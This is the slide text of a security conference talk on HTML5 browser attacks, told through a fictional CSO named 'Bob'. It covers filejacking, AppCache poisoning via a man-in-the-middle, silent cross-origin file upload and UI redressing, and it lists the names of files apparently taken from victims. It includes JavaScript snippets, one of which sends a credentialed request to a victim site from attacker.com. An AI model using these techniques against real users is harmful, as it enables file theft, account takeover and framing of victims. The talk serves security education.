3. Meet Bob
#1 Bob is a CSO of largebiz.com
#1b Bob has interesting stuff
#2 I don’t like Bob
#3 I want to pwn Bob
3
4. Bob’s pwnage stage #1
• Bob has a hobby - e.g. hacking
• He has cool file://s
• I want to get them!
• He’s not THAT stupid to run EXE, SCR
etc.
• Use filejacking!
4
5. Filejacking
• HTML5 directory upload (Chrome only)
<input type=file directory>
• displays this ====>
• JS gets read access to
all files within
chosen folder
5
6. Filejacking
Business plan
• set up tempting webpage
• overlay input (CSS) with
• wait for Bob
• get files & upload them to your server
6
12. Filejacking
• Wireless Assess points.txt
• interesting network next to me.txt
• onlinePasswords.txt
• s/pw.txt
• letter of authorization.pdf
• Staff-<name,surname>.pdf
• <name,surname> - resume.doc
• Pricing-Recommendation_CR.xlsm.zip
• but surely no clients data?
12
13. Filejacking
• sony reports/ • Faktura_numer_26_2011_
0045_sonymusic.##.zip <company>.pdf
• SecurityQA.SQL.Injection. • websec cred~
Results.v1.1.docx • security_users.sql.zip
• SSOCrawlTest5.4.097.xml • !important - questions for
• IPS CDE Wireless Audit- web developers.docx
January 2011-1 0.docx • sslstrip.log~
• IPS Wireless Testing • ##### Paros Log.txt
Schedule April 2011.xls
• 01-####### Corporation
(Security Unarmed So much for NDAs...
Guard).xls
13
14. Filejacking
+ All your file are belong to me
+ Trivial to set up
+ Filter files by e.g. extension, size etc.
- Chrome only
- Requires users prone to social-
engineering
14
15. Bob’s pwnage stage #2
• Bob travels a lot & loves Facebook
• I want to control Bob’s FB account
• even when he changes the password in a month
• I want to fingerprint Bob’s intranet
• Use rogue access point &
AppCache poisoning!
15
16. AppCache poisoning
HTML5 Offline Web
Applications
<html manifest=cache.manifest>
• cache.manifest lists URLs to cache
• cache expires only when CACHE MANIFEST
index.html
manifest is changed stylesheet.css
images/logo.png
scripts/main.js
16
20. AppCache poisoning
Later on, after m-i-t-m:
1. http://victim/ fetched from AppCache
2. browser checks for new manifest
GET /robots.txt
3. receives text/plain robots.txt & ignores it
4. tainted AppCache is still used
20
21. AppCache poisoning
+ Poison any URL
+ Payload stays until manually removed
- Chrome or Firefox with user
interaction
- Needs active man-in-the-middle to
inject
https://github.com/koto/sslstrip
21
22. Bob’s pwnage stage #3
• Bob loves sharing photos (Flickr?)
• I want to replace Bob as CSO
• What if Bob uploaded some discrediting
files?
• Try silent file upload
22
23. Silent file upload
• File upload purely in Javascript
• Emulates <input type=file> with:
• any file name
• any file content
• File constructed in Javascript
(it’s not a real file!)
• Uses Cross Origin Resource Sharing
23
24. Silent file upload
• Cross Origin Resource Sharing
= cross domain AJAX
http://attacker.com/
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://victim", true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.withCredentials = "true"; // send cookies
xhr.send("Anything I want");
24
25. Silent file upload
• raw multipart/form-data request
function fileUpload(url, fileData, fileName) {
var boundary = "xxxxxxxxx",
xhr = new XMLHttpRequest();
xhr.open("POST", url, true);
xhr.withCredentials = "true";
xhr.setRequestHeader("Content-Type",
"multipart/form-data,
boundary="+boundary);
25
30. Same origin policy
• makes web (relatively) safe
• restricts cross-origin communication
• can be relaxed though
• crossdomain.xml
• document.domain
• HTML5 Cross Origin Resource Sharing
• or ignored...
• UI redressing
30
32. UI Redressing
• This is not the page you’re looking at
• This is not the thing you’re clicking
• .................................................. dragging
• .................................................. typing
• .................................................. copying
• Victims attack the applications for us
32
34. Bob’s pwnage stage #4
• Bob likes online games
• I found a vulnerable website used by Bob
• Bob would have to type the payload
himself :-(
• Make Bob play a game!
34